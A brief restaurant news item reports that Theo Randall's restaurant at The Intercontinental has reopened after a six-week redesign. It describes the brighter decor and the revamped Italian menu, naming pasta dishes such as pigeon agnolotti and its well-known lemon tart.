Randall has had his restaurant at The Intercontinental for ten years and with that in mind he decided now was the perfect time to shake things up a bit. Having closed for six weeks, it has just reopened with a new brighter and more modern design….less brown leather and woods and more colour, mirrors, green banquet seating and bare wood tables. The menu too has had a revamp, though plenty of the old classics are there among newer dishes. Theo Randall is well known for his incredible pasta dishes and they are still prominent on the menu….we particularly like the sound of slow cooked pigeon agnolotti and the beef tagliatelle. Elsewhere there are the usual meat and fish options plus a whole range of Italian desserts including THAT lemon tart.
